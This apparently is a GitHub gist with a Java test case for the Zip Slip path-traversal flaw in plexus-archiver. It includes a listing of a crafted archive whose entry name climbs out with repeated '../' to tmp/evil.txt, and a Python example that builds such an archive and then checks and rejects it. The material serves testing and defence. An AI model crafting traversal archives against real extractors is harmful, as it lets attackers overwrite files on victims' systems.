@grnd

grnd/sample.java

Last active November 8, 2018 00:57
plexus-archiver: Zip Slip (path traversal on extraction) test case
import java.io.File;
import org.codehaus.plexus.archiver.zip.ZipUnArchiver;

// Extracts the crafted archive into /tmp/safedir. The second entry's name
// climbs out of the target directory with "../" segments, so an extractor
// that does not canonicalize and contain entry paths writes /tmp/evil.txt.
public void testExtractingZipWithTraversal()
    throws Exception
{
    File testZip = new File( "zip-slip.zip" );
    File targetDirectory = new File( "/tmp/safedir" );
    ZipUnArchiver zu = getZipUnArchiver( testZip ); // helper from the surrounding plexus-archiver test class
    zu.extract( "", targetDirectory );
}

zip-slip.zip is located here: https://drive.google.com/file/d/1c1zOYm0YTF79IncwmklRLEJIjR11cesL/view?usp=sharing

$ 7z l zip-slip.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,4 CPUs x64)

Scanning the drive for archives:
1 file, 545 bytes (1 KiB)

Listing archive: zip-slip.zip

--
Path = zip-slip.zip
Type = zip
Physical Size = 545

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/evil.txt
------------------- ----- ------------ ------------  ------------------------
2018-04-15 22:04:42                 39           39  2 files
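The listing above is the whole attack: a benign good.txt alongside an entry whose name is a long run of "../" followed by tmp/evil.txt. The example below is added here and is not the gist's code nor plexus-archiver's own implementation. It builds an in-memory archive with the same layout (constructed, not the linked zip-slip.zip), then shows the containment check an extractor needs before writing each entry: resolve the destination path and require it to stay under the resolved target directory. The function names (build_archive, is_inside, unsafe_entries, safe_extract) and the entry names are this example's own choices.

```python
import io
import os
import zipfile

# Constructed: same layout as the gist's zip-slip.zip, i.e. one benign entry
# and one entry whose name climbs out of the target directory with "../".
TRAVERSAL_NAME = "../" * 40 + "tmp/evil.txt"


def build_archive(include_traversal: bool = True) -> bytes:
    """Return a zip archive as bytes; optionally add a Zip Slip entry.

    ZipFile.writestr stores the entry name verbatim, so the central directory
    ends up containing the literal "../" segments, exactly like the listing.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("good.txt", "this file is benign\n")
        if include_traversal:
            zf.writestr(TRAVERSAL_NAME, "this must never be written\n")
    return buf.getvalue()


def is_inside(target_dir: str, entry_name: str) -> bool:
    """Canonicalize the would-be destination and require it to stay under target_dir.

    The comparison is on fully resolved paths, never on the raw entry name:
    "../" runs collapse in realpath, and an absolute entry name such as
    "/tmp/evil.txt" makes os.path.join discard the target prefix, so both
    kinds of escape end up outside target and are rejected here.
    """
    target = os.path.realpath(target_dir)
    dest = os.path.realpath(os.path.join(target, entry_name))
    return os.path.commonpath([target, dest]) == target


def unsafe_entries(archive_bytes: bytes, target_dir: str) -> list:
    """Return the entry names in the archive that would escape target_dir."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return [name for name in zf.namelist() if not is_inside(target_dir, name)]


def safe_extract(archive_bytes: bytes, target_dir: str) -> list:
    """Extract only after every entry has passed the containment check.

    Checks all entries first so a bad entry late in the archive cannot leave a
    half-written tree behind. Raises ValueError and writes nothing on failure;
    returns the list of paths written on success.
    """
    bad = unsafe_entries(archive_bytes, target_dir)
    if bad:
        raise ValueError("refusing to extract, traversal entries: %r" % bad)
    written = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            dest = os.path.join(target_dir, info.filename)
            if info.is_dir():
                os.makedirs(dest, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(dest) or ".", exist_ok=True)
            with zf.open(info) as src, open(dest, "wb") as dst:
                dst.write(src.read())
            written.append(dest)
    return written


if __name__ == "__main__":
    data = build_archive()
    print("entries that would escape /tmp/safedir:", unsafe_entries(data, "/tmp/safedir"))
```

Run it and the traversal entry is reported while good.txt is not; safe_extract on the same bytes raises instead of creating /tmp/evil.txt. A name like "a/../b.txt" still resolves inside the target and is allowed, which is the right outcome: the check is about where the entry lands, not about whether ".." appears in it.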